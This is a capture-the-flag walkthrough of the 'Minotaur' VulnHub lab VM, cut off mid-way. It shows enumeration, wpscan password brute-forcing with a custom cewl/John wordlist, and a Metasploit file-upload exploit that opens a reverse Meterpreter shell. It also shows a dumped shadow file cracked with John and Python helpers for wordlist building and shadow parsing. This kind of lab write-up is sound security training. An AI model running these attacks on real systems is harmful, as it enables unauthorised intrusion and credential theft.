Minotaur VulnHub Writeup
- Hints
- Initial discovery
- FTP
- Apache
- Wordpress
- Custom Wordlist
- Enter John
- Metasploit
- The return of John
- heffer
- minotaur
- Conclusion
This image is brought to us by Robert Winkel, and is named Minotaur.
Hints
Reading the description for this image, we find the following two hints.
- This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
- One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.
Initial discovery
Ok, moving on. I had trouble finding the machine on my host-only network, but after performing an nmap scan for port 80, I came across our target. I then ran a more thorough scan.
$ nmap -T4 -A -v -p0-65535 192.168.56.223
Starting Nmap 6.47 ( http://nmap.org ) at 2016-04-14 13:47 EDT
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 13:47
Scanning 192.168.56.223 [1 port]
Completed ARP Ping Scan at 13:47, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:47
Completed Parallel DNS resolution of 1 host. at 13:47, 0.02s elapsed
Initiating SYN Stealth Scan at 13:47
Scanning 192.168.56.223 [65536 ports]
Discovered open port 22/tcp on 192.168.56.223
Discovered open port 80/tcp on 192.168.56.223
Discovered open port 2020/tcp on 192.168.56.223
Completed SYN Stealth Scan at 13:47, 5.45s elapsed (65536 total ports)
Initiating Service scan at 13:47
Scanning 3 services on 192.168.56.223
Completed Service scan at 13:47, 11.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.223
NSE: Script scanning 192.168.56.223.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.17s elapsed
Nmap scan report for 192.168.56.223
Host is up (0.00036s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| ssh-hostkey:
| 1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
| 2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_ 256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-methods: OPTIONS GET HEAD POST
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=4/14%Time=570FD7A2%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 08:00:27:75:F8:9D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Uptime guess: 0.001 days (since Thu Apr 14 13:45:32 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: minotaur
TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.56.223
NSE: Script Post-scanning.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.77 seconds
Raw packets sent: 65559 (2.885MB) | Rcvd: 65554 (2.623MB)
So we've got an ssh server on port 22, an Apache server on port 80, and an ftp server on port 2020 with anonymous login enabled.
FTP
I log in to the FTP server, but come up dry.
$ ftp
ftp> open 192.168.56.223 2020
Connected to 192.168.56.223.
220 Welcome to minotaur FTP service.
Name (192.168.56.223:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 114 4096 May 18 2015 .
drwxr-xr-x 2 0 114 4096 May 18 2015 ..
NEXT!
Apache
The root of the Apache server just returns the default page for an Ubuntu server. I shift to dirsearch to do some common name checking. I first run with the default wordlist, and then switch to an alternative wordlist.
$ python3 dirsearch.py -u192.168.56.223 -ephp -w /usr/share/dict/american-english
_|. _ _ _ _ _ _|_ v0.3.6
(_||| _) (/_(_|| (_| )
Extensions: php | Threads: 10 | Wordlist size: 99171
Error Log: /root/dirsearch/logs/errors-16-04-14_13-49-38.log
Target: 192.168.56.223
[13:49:38] Starting:
[13:50:34] 301 - 314B - /bull -> http://192.168.56.223/bull/
Great, we've got a single hit.
Wordpress
Visiting the URL, we are presented with a rather bullish blog. I fire up wpscan in order to enumerate as much as I can.
$ wpscan --url 192.168.56.223/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.7
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
[+] URL: http://192.168.56.223/bull/
[+] Started: Thu Apr 14 13:52:50 2016
[!] The WordPress 'http://192.168.56.223/bull/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.6
[+] XML-RPC Interface available under: http://192.168.56.223/bull/xmlrpc.php
[i] This may allow the GHOST vulnerability to be exploited, please see: https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
[!] Upload directory has directory listing enabled: http://192.168.56.223/bull/wp-content/uploads/
[+] WordPress version 4.2.2 identified from meta generator
[!] 12 vulnerabilities identified from the version number
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111
Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
Reference: https://twitter.com/klikkioy/status/624264122570526720
Reference: https://klikki.fi/adv/wordpress3.html
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5622
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5623
[i] Fixed in: 4.2.3
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2213
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130
Reference: https://core.trac.wordpress.org/changeset/33536
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5730
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131
Reference: https://core.trac.wordpress.org/changeset/33529
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5732
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132
Reference: https://core.trac.wordpress.org/changeset/33541
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5733
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133
Reference: https://core.trac.wordpress.org/changeset/33549
Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5734
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5714
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7989
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5715
[i] Fixed in: 4.2.5
[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358
Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1564
[i] Fixed in: 4.2.6
[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36435
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2222
[i] Fixed in: 4.2.7
[!] Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36444
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2221
[i] Fixed in: 4.2.7
[+] WordPress theme in use: twentyfourteen - v1.4
[+] Name: twentyfourteen - v1.4
| Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
| Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: https://wordpress.org/themes/twentyfourteen/
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating installed plugins ...
Time: 00:00:02 <====================================================================================================> (2012 / 2012) 100.00% Time: 00:00:02
[+] We found 2 plugins:
[+] Name: akismet - v3.1.1
| Location: http://192.168.56.223/bull/wp-content/plugins/akismet/
| Readme: http://192.168.56.223/bull/wp-content/plugins/akismet/readme.txt
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5
[+] Name: slideshow-gallery - v1.4.6
| Location: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/
| Readme: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/readme.txt
[!] Directory listing is enabled: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/
[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
Reference: https://wpvulndb.com/vulnerabilities/7532
Reference: http://seclists.org/bugtraq/2014/Sep/1
Reference: http://packetstormsecurity.com/files/131526/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5460
Reference: http://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
Reference: http://www.exploit-db.com/exploits/34681/
Reference: http://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8263
Reference: http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
Reference: http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
[i] Fixed in: 1.5.3.4
[+] Enumerating installed themes ...
Time: 00:00:00 <======================================================================================================> (768 / 768) 100.00% Time: 00:00:00
[+] We found 1 themes:
[+] Name: twentyfourteen - v1.4
| Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
| Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
| Theme Name: Twenty Fourteen
| Theme URI: https://wordpress.org/themes/twentyfourteen/
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating timthumb files ...
Time: 00:00:02 <====================================================================================================> (2539 / 2539) 100.00% Time: 00:00:02
[+] No timthumb files found
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
+----+-------+-------+
| Id | Login | Name |
+----+-------+-------+
| 1 | bully | bully |
+----+-------+-------+
[+] Finished: Thu Apr 14 13:53:09 2016
[+] Requests Done: 5484
[+] Memory used: 8.711 MB
[+] Elapsed time: 00:00:18
So we've got a couple of outdated plugins, one with an authenticated file upload vulnerability. In order to take advantage of this, we need the password for the bully user.
After attempting a few common passwords, I take a stab in the dark that this would be the password we need to crack.
Custom Wordlist
The hint we read previously alludes to the requirement of generating our own wordlist. I use the cewl tool to generate a wordlist from the website content, and run this against the installation with wpscan.
$ cewl -w words.txt http://192.168.56.223/bull/
CeWL 5.0 Robin Wood (robin@digininja.org) (www.digininja.org)
$ wpscan --username bully --url http://192.168.56.223/bull/ --wordlist words.txt --threads 10
...snip...
[+] Starting the password brute forcer
Brute Forcing 'bully' Time: 00:00:09 <================================================================================= > (481 / 483) 99.58% ETA: 00:00:00
+----+-------+------+----------+
| Id | Login | Name | Password |
+----+-------+------+----------+
| | bully | | |
+----+-------+------+----------+
[+] Finished: Thu Apr 14 13:59:21 2016
[+] Requests Done: 625
[+] Memory used: 2.805 MB
[+] Elapsed time: 00:00:10
Shucks - no hits. I search for any articles on generating custom word lists with cewl, and come across this great article by NetSec.
Enter John
Following the article above, we generate a wordlist with a minimum word length of 6, and then use John the Ripper's wordlist rules (--rules together with --stdout, so nothing is cracked, only printed) to mutate every word, resulting in a list of candidate passwords.
$ cewl -w words.txt -m 6 http://192.168.56.223/bull/
CeWL 5.0 Robin Wood (robin@digininja.org) (www.digininja.org)
$ john --wordlist=words.txt --rules --stdout > words-john.txt
words: 11258 time: 0:00:00:00 DONE (Thu Apr 14 14:06:33 2016) w/s: 375266 current: Receiving
Next, I fire this off to wpscan again.
$ wpscan --username bully --url http://192.168.56.223/bull/ --wordlist words-john.txt --threads 10
[+] Starting the password brute forcer
Brute Forcing 'bully' Time: 00:03:20 <====================================================================== > (10316 / 11259) 91.62% ETA: 00:00:18
[SUCCESS] Login : bully Password : Bighornedbulls
+----+-------+------+----------------+
| Id | Login | Name | Password |
+----+-------+------+----------------+
| | bully | | Bighornedbulls |
+----+-------+------+----------------+
[+] Finished: Thu Apr 14 14:10:11 2016
[+] Requests Done: 10461
[+] Memory used: 3.039 MB
[+] Elapsed time: 00:03:21
Awesome - we have a valid login!
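To make the cewl-plus-John step concrete, here is an added example (mine, not the author's, and not cewl or John themselves) that does the same two things in miniature: pull the visible words of a page, drop the short ones, and expand each one with a few mutation rules of the kind John's default wordlist rules apply. The HTML is constructed for the example; the page above never says which word on the blog produced the password, so placing "bighornedbulls" in the sample text is an assumption made to show how a capitalisation rule turns a site word into Bighornedbulls.

```python
import re
from html.parser import HTMLParser

# Constructed sample page standing in for the Minotaur blog (not fetched from the target).
# The word "bighornedbulls" is placed here by assumption to illustrate the rule expansion.
SAMPLE_HTML = """
<html><head><title>Bull blog</title></head>
<body>
<h1>Welcome to the bull blog</h1>
<p>We are fans of bighornedbulls and of rodeo days. The herd is huge.</p>
<script>var tracking = "ignoreme";</script>
</body></html>
"""


class _TextExtractor(HTMLParser):
    """Collect visible text, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self._skip = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def extract_words(html, min_len=6):
    """Unique alphabetic words of at least min_len characters, first-seen order (like cewl -m)."""
    parser = _TextExtractor()
    parser.feed(html)
    seen, words = set(), []
    for word in re.findall(r"[A-Za-z]+", " ".join(parser.chunks)):
        if len(word) >= min_len and word.lower() not in seen:
            seen.add(word.lower())
            words.append(word)
    return words


def mutate(word):
    """A small rule set in the spirit of John's wordlist rules: case, suffixes, leet, reverse."""
    base = word.lower()
    cands = [word, base, base.capitalize(), base.upper()]
    cands += [base + str(n) for n in range(10)]
    cands += [base.capitalize() + str(n) for n in range(10)]
    cands += [base + suffix for suffix in ("!", "123", "2015")]
    cands.append(base.translate(str.maketrans("aeios", "43105")))   # a->4 e->3 i->1 o->0 s->5
    cands.append(base[::-1])
    return cands


def build_wordlist(html, min_len=6):
    """The equivalent of `cewl -m 6 ... | john --rules --stdout`: expanded, de-duplicated."""
    out, seen = [], set()
    for word in extract_words(html, min_len):
        for cand in mutate(word):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


if __name__ == "__main__":
    for cand in build_wordlist(SAMPLE_HTML):
        print(cand)
```

The point of the minimum length and the de-duplication is the same as in the real pipeline: every candidate costs one HTTP login attempt against wp-login.php, so the list should be small and free of noise such as script contents.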
Metasploit
We already know that there's a plugin with a file upload vulnerability present, and that metasploit has a module for it, so let's use the tools we have at our disposal. I fire up metasploit and, using the previously discovered login, trigger the exploit.
msf > use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery_upload) > show options
Module options (exploit/unix/webapp/wp_slideshowgallery_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
WP_PASSWORD yes Valid password for the provided username
WP_USER yes A valid username
Exploit target:
Id Name
-- ----
0 WP SlideShow Gallery 1.4.6
msf exploit(wp_slideshowgallery_upload) > set RHOST 192.168.56.223
RHOST => 192.168.56.223
msf exploit(wp_slideshowgallery_upload) > set TARGETURI /bull/
TARGETURI => /bull/
msf exploit(wp_slideshowgallery_upload) > set WP_USER bully
WP_USER => bully
msf exploit(wp_slideshowgallery_upload) > set WP_PASSWORD Bighornedbulls
WP_PASSWORD => Bighornedbulls
msf exploit(wp_slideshowgallery_upload) > run
[*] Started reverse handler on 192.168.56.103:4444
[*] 192.168.56.223:80 - Trying to login as bully
[*] 192.168.56.223:80 - Trying to upload payload
[*] 192.168.56.223:80 - Uploading payload
[*] 192.168.56.223:80 - Calling uploaded file ieqercms.php
[*] Sending stage (32461 bytes) to 192.168.56.223
[*] Meterpreter session 1 opened (192.168.56.103:4444 -> 192.168.56.223:57315) at 2016-04-14 14:11:55 -0400
[+] Deleted ieqercms.php
Next, I open up a shell and find our first flag.
meterpreter > shell
Process 3732 created.
Channel 1 created.
cd /var/www/html
ls -lah
total 28K
drwxr-xr-x 3 www-data www-data 4.0K May 27 2015 .
drwxr-xr-x 3 root root 4.0K May 14 2015 ..
drwxr-xr-x 5 www-data www-data 4.0K May 14 2015 bull
-rw------- 1 www-data www-data 47 May 27 2015 flag.txt
-rw-r--r-- 1 www-data www-data 12K May 14 2015 index.html
cat flag.txt
Oh, lookey here. A flag!
Th15 15 @N 3@5y f1@G!
After a little digging, I find something a little interesting.
cd /tmp
ls -lah
total 16K
drwxrwxrwt 2 root root 4.0K Apr 15 05:39 .
drwxr-xr-x 21 root root 4.0K May 14 2015 ..
-rw-r----- 1 root www-data 121 May 27 2015 flag.txt
-rw-r----- 1 root www-data 1.2K May 27 2015 shadow.bak
cat flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h y@R|)
cat shadow.bak
root:$6$15/OlfJP$h70tk3qikcf.kfwlGpYT7zfFg.cRzlJMlbVDSj3zCg4967ZXG0JzN/6oInrnvGf7AZaJFE2qJdBAOc/3AyeGX.:16569:0:99999:7:::
daemon:*:16484:0:99999:7:::
bin:*:16484:0:99999:7:::
sys:*:16484:0:99999:7:::
sync:*:16484:0:99999:7:::
games:*:16484:0:99999:7:::
man:*:16484:0:99999:7:::
lp:*:16484:0:99999:7:::
mail:*:16484:0:99999:7:::
news:*:16484:0:99999:7:::
uucp:*:16484:0:99999:7:::
proxy:*:16484:0:99999:7:::
www-data:*:16484:0:99999:7:::
backup:*:16484:0:99999:7:::
list:*:16484:0:99999:7:::
irc:*:16484:0:99999:7:::
gnats:*:16484:0:99999:7:::
nobody:*:16484:0:99999:7:::
libuuid:!:16484:0:99999:7:::
syslog:*:16484:0:99999:7:::
mysql:!:16569:0:99999:7:::
messagebus:*:16569:0:99999:7:::
landscape:*:16569:0:99999:7:::
sshd:*:16569:0:99999:7:::
minotaur:$6$3qaiXwrS$1Ctbj1UPpzKjWSgpIaUH0PovtO2Ar/IshWUe4tIUrJf8VlbIIijxdu4xHsXltA0mFavbo701X9.BG/fVIPD35.:16582:0:99999:7:::
ftp:*:16573:0:99999:7:::
heffer:$6$iH6pqgzM$3nJ00ToM38a.qLqcW8Yv0pdRiO/fXOvNv03rBzv./E0TO4B8y.QF/PNZ2JrghQTZomdVl3Zffb/MkWrFovWUi/:16582:0:99999:7:::
h0rnbag:$6$nlapGOqY$Hp5VHWq388mVQemkiJA2U1qLI.rZAFzxCw7ivfyglRNgZ6mx68sE1futUy..m7dYJRQRUWEpm3XKihXPB9Akd1:16582:0:99999:7:::
It looks like we're not finished with John yet..
The return of John
I retrieve the shadow.bak file and fire up John for another round.
./john --fork=8 shadow.bak
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 64/64 OpenSSL])
Warning: OpenMP was disabled due to --fork; a non-OpenMP build may be faster
Node numbers 1-8 of 8 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
Password1 (heffer)
obiwan6 (minotaur)
We've now got what (we hope) are two more valid logins for the target.
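Before handing a shadow file to John it is worth knowing what is in it: which accounts are locked, which actually carry a hash, what algorithm and salt each uses, and when the password was last set. The following is an added example (not the author's code, not part of John) that parses the shadow.bak recovered above and explains John's "Loaded 4 password hashes with 4 different salts" line. The sample input is an excerpt of the shadow.bak lines shown on this page; the last-change day counts decode to the May 2015 dates seen in the directory listings.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

# Excerpt of the shadow.bak recovered from /tmp on the target (lines as shown above).
SHADOW_BAK = """\
root:$6$15/OlfJP$h70tk3qikcf.kfwlGpYT7zfFg.cRzlJMlbVDSj3zCg4967ZXG0JzN/6oInrnvGf7AZaJFE2qJdBAOc/3AyeGX.:16569:0:99999:7:::
daemon:*:16484:0:99999:7:::
www-data:*:16484:0:99999:7:::
libuuid:!:16484:0:99999:7:::
mysql:!:16569:0:99999:7:::
minotaur:$6$3qaiXwrS$1Ctbj1UPpzKjWSgpIaUH0PovtO2Ar/IshWUe4tIUrJf8VlbIIijxdu4xHsXltA0mFavbo701X9.BG/fVIPD35.:16582:0:99999:7:::
ftp:*:16573:0:99999:7:::
heffer:$6$iH6pqgzM$3nJ00ToM38a.qLqcW8Yv0pdRiO/fXOvNv03rBzv./E0TO4B8y.QF/PNZ2JrghQTZomdVl3Zffb/MkWrFovWUi/:16582:0:99999:7:::
h0rnbag:$6$nlapGOqY$Hp5VHWq388mVQemkiJA2U1qLI.rZAFzxCw7ivfyglRNgZ6mx68sE1futUy..m7dYJRQRUWEpm3XKihXPB9Akd1:16582:0:99999:7:::
"""

# crypt(3) identifiers in the "$id$salt$digest" family; anything else is reported by id.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}


@dataclass
class ShadowEntry:
    user: str
    field: str                 # raw password field
    last_change: int           # days since 1970-01-01
    state: str                 # "empty", "locked" or "crackable"
    algo: Optional[str] = None
    salt: Optional[str] = None
    rounds: Optional[int] = None   # None means the algorithm default (5000 for sha512crypt)

    def last_change_date(self) -> str:
        return (date(1970, 1, 1) + timedelta(days=self.last_change)).isoformat()


def _classify(field):
    """Return (state, algo, salt, rounds) for one shadow password field."""
    if field == "":
        return "empty", None, None, None
    if field[0] in "!*":                       # "!" = locked, "*" = no password login
        return "locked", None, None, None
    if field.startswith("$"):
        parts = field.split("$")[1:]           # ["6", "salt", "digest"] or ["6", "rounds=N", "salt", "digest"]
        algo = CRYPT_IDS.get(parts[0], "crypt-" + parts[0])
        rest, rounds = parts[1:], None
        if rest and rest[0].startswith("rounds="):
            rounds = int(rest[0].split("=", 1)[1])
            rest = rest[1:]
        return "crackable", algo, (rest[0] if rest else None), rounds
    return "crackable", "descrypt", field[:2], None   # 13-char traditional DES, salt = first two chars


def parse_shadow(text):
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"line {lineno}: expected 9 fields, got {len(fields)}")
        state, algo, salt, rounds = _classify(fields[1])
        entries.append(ShadowEntry(fields[0], fields[1], int(fields[2] or 0), state, algo, salt, rounds))
    return entries


def crackable(entries):
    """Only the accounts John will actually load: a real hash, not locked or empty."""
    return [e for e in entries if e.state == "crackable"]


def john_input(entries):
    """user:hash lines for the crackable accounts, ready for john --wordlist=..."""
    return "\n".join(f"{e.user}:{e.field}" for e in crackable(entries))


if __name__ == "__main__":
    entries = parse_shadow(SHADOW_BAK)
    for e in crackable(entries):
        rounds = e.rounds or "default"
        print(f"{e.user:10} {e.algo:12} salt={e.salt} rounds={rounds} changed={e.last_change_date()}")
```

Four entries survive the filter (root, minotaur, heffer, h0rnbag), each with its own salt, which is exactly what John reported. Distinct salts matter for cost: every candidate has to be hashed once per salt, so with sha512crypt at its default 5000 rounds a wordlist-plus-rules run against four hashes is four times the work of a run against one.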
heffer
Using my favourite Python snippet to get a proper tty, we su to heffer and check out their home directory, as well as their sudo permissions.
python -c 'import pty; pty.spawn("/bin/bash");'
www-data@minotaur:/tmp$ su heffer
su heffer
Password: Password1
heffer@minotaur:/tmp$ cd /home/heffer
cd /home/heffer
heffer@minotaur:~$ ls -lah
ls -lah
total 28K
drwx------ 3 heffer heffer 4.0K May 27 2015 .
drwxr-xr-x 5 root root 4.0K May 27 2015 ..
lrwxrwxrwx 1 heffer heffer 9 May 27 2015 .bash_history -> /dev/null
-rw-r--r-- 1 heffer heffer 220 May 27 2015 .bash_logout
-rw-r--r-- 1 heffer heffer 3.6K May 27 2015 .bashrc
drwx------ 2 heffer heffer 4.0K May 27 2015 .cache
-rw------- 1 heffer heffer 107 May 27 2015 flag.txt
-rw-r--r-- 1 heffer heffer 675 May 27 2015 .profile
heffer@minotaur:~$ cat flag.txt
cat flag.txt
So this was an easy flag to get, hopefully. Have you gotten ~minotaur/flag.txt yet?
Th3 fl@G 15: m00000 y0
sudo -l
Matching Defaults entries for heffer on minotaur:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User heffer may run the following commands on minotaur:
(root) NOPASSWD: /root/bullquote.sh
Curious - we are able to sudo a script named /root/bullquote.sh. Let's give it a try.
heffer@minotaur:~$ sudo /root/bullquote.sh
sudo /root/bullquote.sh
[sudo] password for heffer: Password1
sudo: /root/bullquote.sh: command not found
Damn, ok.. moving on. The script simply doesn't exist, and since /root is only accessible to root we can't plant one of our own there, so this rule is one of the advertised red herrings.
minotaur
I repeat the process for minotaur.
www-data@minotaur:/tmp$ su minotaur
su minotaur
Password: obiwan6
minotaur@minotaur:/tmp$ cd /home/minotaur
cd /home/minotaur
minotaur@minotaur:~$ ls -alh
ls -alh
total 36K
drwx------ 4 minotaur minotaur 4.0K May 27 2015 .
drwxr-xr-x 5 root root 4.0K May 27 2015 ..
lrwxrwxrwx 1 minotaur minotaur 9 May 27 2015 .bash_history -> /dev/null
-rw-r--r-- 1 minotaur minotaur 220 May 14 2015 .bash_logout
-rw-r--r-- 1 minotaur minotaur 3.6K May 14 2015 .bashrc
drwx------ 2 minotaur minotaur 4.0K May 14 2015 .cache
-rw------- 1 minotaur minotaur 107 May 27 2015 flag.txt
-rw-r--r-- 1 minotaur minotaur 22 May 27 2015 .gdbinit
drwxr-xr-x 4 minotaur minotaur 4.0K May 27 2015 peda
